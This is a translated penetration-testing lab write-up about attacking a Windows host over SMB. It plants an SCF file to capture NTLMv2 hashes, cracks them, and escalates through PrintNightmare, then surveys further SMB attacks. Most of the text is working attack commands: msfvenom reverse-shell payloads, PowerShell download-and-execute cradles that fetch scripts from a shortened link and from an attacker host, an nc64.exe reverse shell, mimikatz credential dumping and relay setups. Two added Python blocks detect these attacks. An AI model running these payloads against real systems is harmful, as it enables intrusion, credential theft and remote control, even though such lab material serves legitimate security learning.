Practical Learning of Network Security Penetration

Foreword

This penetration test uses the SCF file attack on an SMB share as its entry point and touches a number of knowledge points: brute-forcing Basic Authorization with Burp using encoded payloads, the various ways of connecting to SMB, methods for cracking the NTLM values of Windows users, the use of evil-winrm, Windows host information-gathering tools, running PowerShell scripts from msf and running them remotely, and privilege escalation through the PrintNightmare vulnerability.

Technically this penetration is not very difficult. The value of this article is that many knowledge points come together in the process, and the various ways of carrying out SMB attacks are summarized. Let's begin the actual penetration.

Information gathering

First, run a basic port scan:

Seeing port 445 brought to mind the various ways of using SMB; seeing 5985 suggested that evil-winrm might be usable; so the focus went to port 445 first.

nmap -A --script smb-vuln* -p 445 10.10.11.106

No direct breakthrough was found, so we still start from the web.


SMB anonymous login

Try SMB anonymous login to see whether there are shared files that could serve as a clue for a breakthrough;

Commonly used commands are summarized as follows:

smbmap -H 10.10.11.106
smbclient -N -L //10.10.11.106
enum4linux -a 10.10.11.106


Brute-forcing the encoded credentials with Burp

Opening the web page pops up a Basic Authorization prompt.

Capture the request for brute-forcing;

Three payload positions need to be set on the marked line, respectively: 1) the username admin, 2) the colon separator, 3) the password; the combined value is then encoded the way Basic authentication expects.

Running a weak-password dictionary produced a result:

admin:admin

SCF file attack on SMB sharing

Log in to the admin backend and find a place where files can be uploaded;

After many attempts, the SCF file attack turned out to be usable for penetration. Here are three ways of using it:

SMB Attacks via NTLM Trapping

Rationale: SCF (Shell Command File) files can perform a limited set of operations, and an SCF file can point at a specific UNC path, which lets a penetration tester construct an attack. The content below is placed in a text file, which then needs to be planted on a network share.

[Shell]
Command=2
IconFile=\\10.10.16.4\share\hack.ico
[Taskbar]
Command=ToggleDesktop

Save hack.txt as an SCF file; adding an @ symbol in front of the file name (@hack.scf) places it at the top of the shared drive's file listing. Then set up the method for receiving the authentication attempt;

Responder needs to be executed with the following parameters to capture the hash of a user browsing the share.

responder -wrf -I tun0

When a user browses the share, a network connection is automatically made from their system to the UNC path contained in the SCF file. Windows attempts to authenticate to that share with the user's username and password. During authentication a random 8-byte challenge is sent from the server to the client, and the NTLM/LANMAN password hash is used to encrypt this challenge. Responder captures the resulting NTLMv2 hashes.

Besides Responder, MSF also has a module that captures challenge/response password hashes from SMB clients.

auxiliary/server/capture/smb


Upload the hack.scf created earlier to trigger it, and obtain the user's NTLM value.

Getting a shell directly

Use the MSF framework to carry out the attack:

exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.16.4
set smbhost 192.168.0.100
set srvport 8080
exploit

Upload the earlier hack.scf to trigger it; however, this method failed in this penetration test.

Uploading a payload to get a shell

The main advantage of this method is that it requires no interaction with the user: the user is automatically forced to connect to the share, without the NTLMv2 hash having to be cracked. It can therefore be combined with SMB relay, which delivers a payload that retrieves a Meterpreter shell from every user who accesses the share.

MSFVenom can generate the payload that will be executed on the target:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > hack.exe

The smbrelayx Python script in Impacket can set up the relay attack and deliver the payload when the target host tries to connect to the SMB server. This happens automatically, because the SCF file forces each user to authenticate with their own credentials to a non-existent share.

./smbrelayx.py -h Target-IP -e ./hack.exe

At the same time, use MSF to set up the handler that receives the payload's callback:

exploit/multi/handler

The module needs to be configured with the same parameters as the generated payload.

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit

When a user browses the share, the SMB server receives the connection, uses the relayed username and password hash to authenticate to the user's own system, and executes the payload through a writable share. In this penetration test the method failed.

After obtaining the NTLM value, the next step is to try to crack it.

Cracking LM, NTLM and Net-NTLMv2

By default the Windows password hash is composed of two parts: the first is the LM hash, the second is the NT hash.

LM hash

Disabled by default since Windows Vista / Server 2008; it can still be encountered on older versions and, for backward compatibility, Windows allows it to be re-enabled through Group Policy.
Example: 299BD128C1101FD6
Hash cracking:

john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt

NT hash

The NT hash (commonly called the NTLM hash) is how passwords are stored on modern Windows systems; it can be obtained by dumping the SAM database or by using Mimikatz.
Example:
B4B9B02E6F09A9BD760F388B67351E2B
Hash cracking:

john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt

NTLMv1

The NTLM protocol uses the NT hash in the challenge/response exchange between server and client; version 1 of the protocol uses both the NT and LM hashes, depending on configuration and on what is available.
Example:

u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c

Hash cracking:

john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

NTLMv2

This is a newer and improved version of the NTLM protocol that is much harder to crack. The concept is the same as NTLMv1, but the algorithm and the response sent to the server differ; it has been the default in Windows since Windows 2000.
Example:

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

Hash cracking:

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt
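For a defender or incident responder, a capture file of such challenge/response lines mainly answers two questions: which accounts were exposed, and whether the weak NTLMv1 format was in play (a sign that the LAN Manager authentication level should be raised). The following Python example is added here and is not part of the original write-up; it classifies lines by the field layouts described above, using the write-up's example hashes as constructed input.

```python
import re

HEX = r"[0-9a-fA-F]"
# NetNTLMv1: user::domain:lm_response(48 hex):nt_response(48 hex):server_challenge(16 hex)
V1_RE = re.compile(rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<lm>{HEX}{{48}}):"
                   rf"(?P<nt>{HEX}{{48}}):(?P<challenge>{HEX}{{16}})$")
# NetNTLMv2: user::domain:server_challenge(16 hex):NTProofStr(32 hex):blob(variable hex)
V2_RE = re.compile(rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>{HEX}{{16}}):"
                   rf"(?P<proof>{HEX}{{32}}):(?P<blob>{HEX}+)$")


def classify(line):
    """Identify a captured challenge/response line; return its fields or None."""
    line = line.strip()
    m = V1_RE.match(line)
    if m:
        # An LM response of 8 client-nonce bytes followed by 16 zero bytes is the
        # NTLMv1 + Extended Session Security (NTLM2 session) variant.
        ess = m["lm"][16:] == "0" * 32
        return {"type": "NetNTLMv1", "user": m["user"], "domain": m["domain"],
                "challenge": m["challenge"], "ess": ess}
    m = V2_RE.match(line)
    if m:
        return {"type": "NetNTLMv2", "user": m["user"], "domain": m["domain"],
                "challenge": m["challenge"], "proof": m["proof"]}
    return None


def triage(capture_text):
    """Map (domain, user) to the weakest protocol version seen for that account."""
    exposed = {}
    for line in capture_text.splitlines():
        info = classify(line)
        if info is None:
            continue
        key = (info["domain"].lower(), info["user"].lower())
        if info["type"] == "NetNTLMv1" or key not in exposed:
            exposed[key] = info["type"]
    return exposed


# Constructed capture: the write-up's two example lines plus an unrelated log line.
V1_LINE = "u4-netntlm::kNS:338d08f8e26de933" + "0" * 32 + ":9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c"
V2_LINE = "admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030"
SAMPLE_CAPTURE = "\n".join(["some unrelated log line", V1_LINE, V2_LINE])

if __name__ == "__main__":
    for (domain, user), proto in triage(SAMPLE_CAPTURE).items():
        print(f"{domain}\\{user}: {proto}")
```

Accounts listed as NetNTLMv1 should have their passwords reset and the client's LmCompatibilityLevel reviewed, since that format is far cheaper to crack than NTLMv2.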

NTLMv2 was used in this penetration test:

hashcat -m 5600 -a 3 123.txt --wordlist top100.txt

john --format=netntlmv2 123.txt -w=top100.txt

Successfully obtained the username and password: tony:liltony

Based on the open ports 445 and 5985, try connecting;

The attempt to connect with psexec failed;


evil-winrm -i 10.10.11.106 -u tony -p liltony

The connection succeeds; the next step is to find a way to escalate privileges.

SMB login with username and password

With the obtained username and password, try logging in to the SMB share again;


Privilege escalation

Host information gathering

Running the command directly fails: no permission to execute it;

So use a script instead; the commonly used ones are winPEASx64.exe or winPEAS.bat. There is a small pitfall here: the program name needs a path prefix with a backslash (.\) when it is run;


There were many results; in the end the Print Spooler service stood out.

Exploit the recent Windows Print Spooler remote code execution vulnerability (CVE-2021-1675) to escalate privileges.

https://github.com/calebstewart/CVE-2021-1675

Testing showed that importing the PowerShell script directly reports an error;

The following two methods were used in turn;

msf load powershell

Generate a Trojan (payload)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=7777 -f exe > hack.exe

Receive the reverse connection;

Upload hack.exe with evil-winrm and run it;

The program reports an error and the session is interrupted. Migrate the process and try again;

The ps1 script must be uploaded to the corresponding location on the host in advance, otherwise the script cannot be found!

This time the script executed successfully and a new user with administrator privileges was added. You can also try running the PS script remotely.

Running PowerShell scripts remotely

Download a file remotely to the local host and execute it:

cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notepad.exe

Execute a ps1 script remotely:

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"

Host your own HTTP server

Run the PS script remotely;

IEX(New-Object Net.Webclient).downloadstring('http://10.10.16.4:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "hack123" -NewPassword "hack123"


Try to grab the passwords;

./mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit

At this point the host has been successfully taken down; the bonus section below summarizes several other common SMB attack methods.

SMB attack methods

Versions of Windows SMB

CIFS: An older version of SMB that was included in Microsoft Windows NT 4.0 in 1996.

SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003, and Windows Server 2003 R2.

SMB 2.0 / SMB2: This version is for Windows Vista and Windows Server 2008.

SMB 2.1 / SMB2.1: This version is for Windows 7 and Windows Server 2008 R2.

SMB 3.0 / SMB3: This version is for Windows 8 and Windows Server 2012.

SMB 3.02 / SMB3: This version is for Windows 8.1 and Windows Server 2012 R2.

SMB 3.1: This version is for Windows Server 2016 and Windows 10.

Currently the latest version of SMB is 3.1.1, introduced in Windows 10 and Windows Server 2016. This release supports AES-128-GCM encryption and uses SHA-512 hashing, in addition to the AES-128-CCM encryption added in SMB 3. SMB 3.1.1 also enforces secure negotiation when connecting to clients using SMB 2.x and later.

EternalBlue

Run the following MSF module, which exploits the target machine directly.

use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit

Brute force

hydra -L user.txt -P pass.txt 192.168.1.101 smb
-L --> specifies the username list
-P --> specifies the password list

If the brute force succeeds, the users on the system can be enumerated;

use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit

Test it;

PsExec connection over SMB

You can use the module in msf;

use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Because this attempt was unsuccessful in this penetration test, I substituted the earlier screenshot;

You can also use psexec.py from Impacket:
# Connect with a plaintext password

./psexec.py xie/administrator:[email protected]

# Connect with the hash value

./psexec.py xie/[email protected] -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC

You can also use the psexec.exe program directly;

Rundll32 one-liner

Launch Rundll32 Attack via Metasploit's SMB Delivery

Metasploit also includes an "SMB Delivery" module that generates malicious DLL files. The module serves payloads via an SMB server and provides the commands to retrieve and execute the generated payloads. DLL and PowerShell are currently supported.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

This generates a link to the malicious DLL file; send this link to your target and wait for them to act on it.

Once the victim runs the malicious code inside the Run Prompt or Command Prompt, we get a Meterpreter session on Metasploit.

SMB DoS attack

The SMB DoS attack is another method available in the Metasploit framework.

This module exploits a denial-of-service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger the bug, run this module as a service and force vulnerable clients to access this system's IP as an SMB server. If the target uses Internet Explorer or opens a Word document, this can be achieved by embedding the UNC path (\\HOST\share\something) in the web page or document.

use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Remote file transfer and operation

File transfer works as follows:

Use smbserver.py from the well-known Impacket package to transfer files.
The share name and directory are chosen to suit your own setup: smbserver.py share '/root/exp'

Then, in the listening shell, run copy CEH.kdbx \\10.10.14.57\Share, and the file is received successfully.

You can also run programs remotely;

Start the smbserver service from Impacket and place ms15-051x64 and nc64.exe in the shared directory I specified:

python smbserver.py Share '/root/htb/bastard'

Execute the reverse shell from the shell;

\\10.10.14.57\share\ms15-051x64.exe "\\10.10.14.57\share\nc64.exe -e cmd 10.10.14.57 443"

Meanwhile, this machine listens on port 443; the connection is received and the job is done.

Summary

For SCF file attacks, the following methods can also prevent this attack:
1. Use Kerberos authentication or SMB signing;

2. Disable write permission on shared folders for unauthenticated users;

3. Make sure NTLMv2 is in use and increase password complexity.
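The mitigations above address the SCF file attack described earlier; a complementary check on the file-server side is to scan a share's directory for SCF files whose IconFile points at another host, which is exactly the trigger the planted @hack.scf relies on. The following Python example is added here and is not part of the original write-up; it assumes the share's contents are readable under a local directory, and uses the write-up's SCF content as a constructed sample beside a benign SCF with a local icon.

```python
import os
import re
import tempfile

SECTION_RE = re.compile(r"^\s*\[([^\]]+)\](.*)$")   # [Section] plus optional same-line key=value
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")           # \\host\share\... ; captures host


def parse_scf(text):
    """Parse SCF (INI-like) text into {section: {key: value}}, names lowercased."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:  # tolerate a key written on the same line as its section header
            section = m.group(1).strip().lower()
            result.setdefault(section, {})
            line = m.group(2).strip()
        if section is not None and "=" in line:
            key, value = line.split("=", 1)
            result[section][key.strip().lower()] = value.strip()
    return result


def remote_icon_host(text):
    """Return the host an IconFile UNC path points at, or None for local icons."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    return m.group(1) if m else None


def scan_share(root):
    """List (file name, remote host) for every .scf under root whose icon is remote."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".scf"):
                with open(os.path.join(dirpath, name), encoding="utf-8", errors="replace") as fh:
                    host = remote_icon_host(fh.read())
                if host:
                    findings.append((name, host))
    return sorted(findings)


# Constructed samples: the SCF from the write-up, and a benign one using a local icon.
PLANTED_SCF = "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.16.4\\share\\hack.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=%SystemRoot%\\system32\\SHELL32.dll,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"

def demo():
    with tempfile.TemporaryDirectory() as share:  # stand-in for the share's directory
        for fname, body in (("@hack.scf", PLANTED_SCF), ("desktop.scf", BENIGN_SCF)):
            with open(os.path.join(share, fname), "w") as fh:
                fh.write(body)
        return scan_share(share)
```

Any hit whose host is not one of your own file servers is a planted file: remove it, review who had write access to that share, and treat accounts that browsed it as having had their Net-NTLM responses exposed.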


Origin blog.csdn.net/xv7676/article/details/130871195